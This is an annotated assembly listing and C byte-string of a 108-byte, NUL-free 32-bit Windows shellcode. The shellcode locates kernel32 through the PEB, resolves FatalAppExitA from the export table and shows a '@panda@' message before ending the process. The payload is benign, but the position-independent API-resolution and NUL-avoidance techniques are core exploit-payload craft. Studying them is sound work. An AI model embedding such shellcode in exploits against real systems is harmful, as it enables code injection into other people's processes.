Appears to work on every Windows version: it resolves FatalAppExit (the ANSI export FatalAppExitA) to pop up a message box and then terminate the process. The shellcode byte string is very short (108 bytes, 32-bit code, no NUL bytes).
; ----------------------------------------------------------------------
; 32-bit (x86) Windows shellcode: locate kernel32.dll via the PEB loader
; lists, walk its export table for FatalAppExitA, then call
; FatalAppExitA(0, "@panda@"). Registers used below:
;   edx = walking pointer (PEB -> PEB_LDR_DATA -> LDR entry links -> export dir)
;   eax = kernel32 image base (used to relocate every RVA)
;   edi = PE header, then export-name / ordinal / address tables, then the
;         resolved function pointer
;   esi = current name string while scanning the export name table
;   ebp = index into the export name table
; Not shown in this listing (the byte string below starts with 31 D2):
; the instruction at 00406030 is `xor edx,edx`, which zeroes edx so that
; `mov dl,0x30` can build fs:[0x30] without a NUL byte in the encoding.
; ----------------------------------------------------------------------
00406032 B2 30 mov dl,0x30                                        ; edx = 0x30 (offset of PEB in TEB); 8-bit write keeps the encoding NUL-free
00406034 64:8B12 mov edx,dword ptr fs:[edx]                       ; edx = fs:[0x30] = PEB
00406037 8B52 0C mov edx,dword ptr ds:[edx+0xC] ; _PEB_LDR_DATA    ; edx = PEB->Ldr
0040603A 8B52 1C mov edx,dword ptr ds:[edx+0x1C] ; InInitializationOrderModuleList first entry (Flink points INTO the entry, at its InInitializationOrderLinks field)
; Loop: test the current entry; on mismatch move to the next one.
; NOTE(review): because edx points at InInitializationOrderLinks (entry+0x10),
; [edx+0x8] is the entry's DllBase and [edx+0x20] is BaseDllName.Buffer on
; x86 — the original comments named these InMemoryOrderLinks / FullDllName;
; verify against the LDR_DATA_TABLE_ENTRY layout for the target build.
0040603D 8B42 08 mov eax,dword ptr ds:[edx+0x8] ; eax = DllBase of current entry (kept as kernel32 base once the loop exits)
00406040 8B72 20 mov esi,dword ptr ds:[edx+0x20] ; esi = BaseDllName.Buffer (UTF-16 module name)
00406043 8B12 mov edx,dword ptr ds:[edx] ; edx = next entry in InInitializationOrderModuleList (advanced BEFORE the test, so a retry examines the following entry)
00406045 807E 0C 33 cmp byte ptr ds:[esi+0xC],0x33                 ; UTF-16 char index 6 == '3'  ("kernel32.dll"); rejects ntdll / kernelbase, which carry a different char there
00406049 ^ 75 F2 jnz XlastTest.0040603D                           ; not kernel32 -> keep walking (no end-of-list check: an absent match walks until it faults)
; eax = kernel32 base. Parse the PE export directory.
0040604B 89C7 mov edi,eax
0040604D 0378 3C add edi,dword ptr ds:[eax+0x3C] ; pe              ; edi = base + e_lfanew = IMAGE_NT_HEADERS
00406050 8B57 78 mov edx,dword ptr ds:[edi+0x78] ; export directory RVA (DataDirectory[0].VirtualAddress)
00406053 01C2 add edx,eax                                         ; edx = IMAGE_EXPORT_DIRECTORY (VA)
00406055 8B7A 20 mov edi,dword ptr ds:[edx+0x20] ; ENT             ; AddressOfNames RVA
00406058 01C7 add edi,eax                                         ; edi = export name table (VA)
0040605A 31ED xor ebp,ebp                                         ; ebp = name index, starting at 0
; Scan the export name table until a name matches "Fata" at +0 and "Exit" at +8.
; Note that ebp is incremented BEFORE the compare, so after a hit ebp == matched index + 1.
0040605C 8B34AF mov esi,dword ptr ds:[edi+ebp*4]                  ; esi = RVA of name[ebp]
0040605F 01C6 add esi,eax                                         ; esi = name string (VA)
00406061 45 inc ebp                                               ; ebp = index + 1 (see notes at the ordinal lookup below)
00406062 813E 46617461 cmp dword ptr ds:[esi],0x61746146 ; bytes 0-3 == "Fata"
00406068 ^ 75 F2 jnz XlastTest.0040605C                           ; mismatch -> next name (unbounded loop, no NumberOfNames check)
0040606A 817E 08 4578697>cmp dword ptr ds:[esi+0x8],0x74697845 ; bytes 8-11 == "Exit" -> "FatalAppExit?" ; both FatalAppExitA and FatalAppExitW satisfy this; the name table is ordinarily sorted, so the 'A' variant is hit first
00406071 ^ 75 E9 jnz XlastTest.0040605C ; FatalAppExit shows a message box and terminates the application when the box is closed
; Map name index -> ordinal -> function RVA.
00406073 8B7A 24 mov edi,dword ptr ds:[edx+0x24] ; AddressOfNameOrdinals RVA
00406076 01C7 add edi,eax                                         ; edi = name-ordinal table (VA, 16-bit entries)
; NOTE(review): ebp is index+1 here, so this reads the ordinal of the NEXT name,
; and the -0x4 at 00406081 then steps back one slot in the address table. That
; is only correct when the name ordinals are consecutive (true in practice for
; kernel32); the robust form is `word ptr [edi+ebp*2-0x2]` here and no -0x4 below.
; The 16-bit write to bp is safe only because the upper half of ebp is still 0.
00406078 66:8B2C6F mov bp,word ptr ds:[edi+ebp*2] ; bp = ordinal (unbiased) taken from slot index+1
0040607C 8B7A 1C mov edi,dword ptr ds:[edx+0x1C] ; EAT             ; AddressOfFunctions RVA
0040607F 01C7 add edi,eax                                         ; edi = export address table (VA)
00406081 8B7CAF FC mov edi,dword ptr ds:[edi+ebp*4-0x4] ; function RVA: EAT[ordinal-1] compensates for the index+1 above
00406085 01C7 add edi,eax ; edi = address of FatalAppExitA (typo "FatalAppExiA" in the original)
; Build the NUL-terminated message "@panda@" on the stack. The bytes pushed are
; "da@\x01" then "@pan", giving "@panda@\x01" at esp; the 0x01 is decremented to
; 0x00 afterwards so the shellcode itself contains no NUL byte.
00406087 68 64614001 push 0x1406164                               ; "da@\x01"
0040608C 68 4070616E push 0x6E617040                              ; "@pan"
; (Listing note: 0040608C+5 = 00406091, but the next line is at 00406096; the
; byte string below has no such gap — it goes straight from this push to mov ecx,esp.)
00406096 89E1 mov ecx,esp                                         ; ecx = pointer to "@panda@\x01"
00406098 FE49 07 dec byte ptr ds:[ecx+0x7]                        ; 0x01 -> 0x00: terminate the string
0040609B 31C0 xor eax,eax                                         ; eax = 0 = uAction
; FatalAppExitA(UINT uAction, LPCSTR lpMessageText) is stdcall: push right-to-left.
0040609D 51 push ecx                                              ; lpMessageText
0040609E 50 push eax                                              ; uAction = 0
0040609F FFD7 call edi                                            ; FatalAppExitA(0, "@panda@"); no stack cleanup — the process is expected to end here (under a debugger the call may return and fall through)
// Raw bytes of the shellcode above, as a C string literal. The first two bytes
// (31 D2 = xor edx,edx) precede the first instruction shown in the listing;
// the remaining bytes correspond one-to-one to the listed opcodes. The string
// contains no 0x00 byte (the message terminator is produced at run time by
// `dec byte ptr [ecx+7]`), so it survives strcpy-style copies.
// 32-bit code only: it relies on fs:[0x30] and the x86 PEB/LDR/PE offsets.
"\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B"
"\x12\x80\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20"
"\x01\xC7\x31\xED\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E"
"\x08\x45\x78\x69\x74\x75\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01"
"\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68\x64\x61\x40\x01\x68\x40\x70\x61\x6E\x89\xE1\xFE"
"\x49\x07\x31\xC0\x51\x50\xFF\xD7"
// 108 bytes. Reported by the author as working on Win8, Win7, WinVista, WinXP,
// Win2kPro, Win2k8, Win2k8R2, Win2k3 (32-bit processes); the kernel32 lookup
// keys on the '3' in "kernel32.dll" so the changed module order on Win7+ does not matter.